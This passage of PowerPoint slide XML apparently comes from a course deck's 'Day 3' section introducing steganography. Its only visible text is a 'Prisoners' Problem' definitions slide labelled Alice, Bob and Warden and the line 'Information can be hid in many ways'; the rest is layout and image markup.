        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="1162429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="1162429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="3429000">
                <a:moveTo>
                  <a:pt x="0" y="3429000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144000" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3429000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920432" y="145287"/>
            <a:ext cx="7303134" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="12700" algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="6000" kern="0" spc="-5" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DAY 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="6000" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6642099" y="1825792"/>
            <a:ext cx="1938971" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Information can be hid in many ways.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="19002" t="48172" r="35998" b="20702"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4571999" y="5131328"/>
            <a:ext cx="4114800" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="18333" t="48518" r="35834" b="18874"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1241637"/>
            <a:ext cx="5849404" cy="2339763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="18333" t="49446" r="36667" b="18479"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5162549" y="3758436"/>
            <a:ext cx="2933700" cy="1175663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect l="24199" t="48775" r="42467" b="20099"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="4141469"/>
            <a:ext cx="3962400" cy="2080260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1439444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6891" y="3728414"/>
            <a:ext cx="3505200" cy="2944288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="1162429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="1162429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="3429000">
                <a:moveTo>
                  <a:pt x="0" y="3429000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144000" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3429000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920432" y="145287"/>
            <a:ext cx="7303134" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="12700" algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="6000" kern="0" spc="-5" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DAY 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="6000" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect r="32500"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1285303"/>
            <a:ext cx="2800891" cy="2332937"/>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5200" y="1357269"/>
            <a:ext cx="3506112" cy="2945055"/>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6400" y="3741115"/>
            <a:ext cx="3506113" cy="2945055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="751517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4747" y="88033"/>
            <a:ext cx="1215565" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-149" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Steganography</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7618110" y="102655"/>
            <a:ext cx="967670" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>A.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-168" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Definitions</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549737" y="682125"/>
            <a:ext cx="2823734" cy="426912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="2774" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Prisoners’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Problem</a:t>
            </a:r>
            <a:endParaRPr sz="2774">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598197" y="1403454"/>
            <a:ext cx="1650690" cy="1194977"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7214126" y="1418644"/>
            <a:ext cx="1336755" cy="1205106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3899578" y="4750407"/>
            <a:ext cx="1387390" cy="1164597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076339" y="2652165"/>
            <a:ext cx="671958" cy="320216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="2081" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>Ali</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>ce</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7646698" y="2652165"/>
            <a:ext cx="512148" cy="320216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="2081" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>ob</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4106319" y="5953547"/>
            <a:ext cx="1038138" cy="320216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="2081" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>Wa</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608394" y="1306235"/>
            <a:ext cx="1435776" cy="1580486"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="724535" h="797560">
                <a:moveTo>
                  <a:pt x="652592" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="214123" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187853" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164936" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148727" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142578" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142578" y="654125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71033" y="654125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44843" y="660273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22102" y="676482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6068" y="699399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="725670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6068" y="751940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22102" y="774857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44843" y="791066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71033" y="797215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="510013" y="797215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536283" y="791066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="559200" y="774857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575409" y="751940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581558" y="725670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581558" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652592" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678862" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701779" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="717988" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="724137" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="717988" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701779" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678862" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652592" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E5E5E5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608394" y="1306235"/>
            <a:ext cx="1435776" cy="1580486"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="724535" h="797560">
                <a:moveTo>
                  <a:pt x="71033" y="797215"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="44843" y="791066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22102" y="774857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6068" y="751940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="725670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6068" y="699399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22102" y="676482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44843" y="660273"/>
                </a:lnTo>
                <a:lnTo>
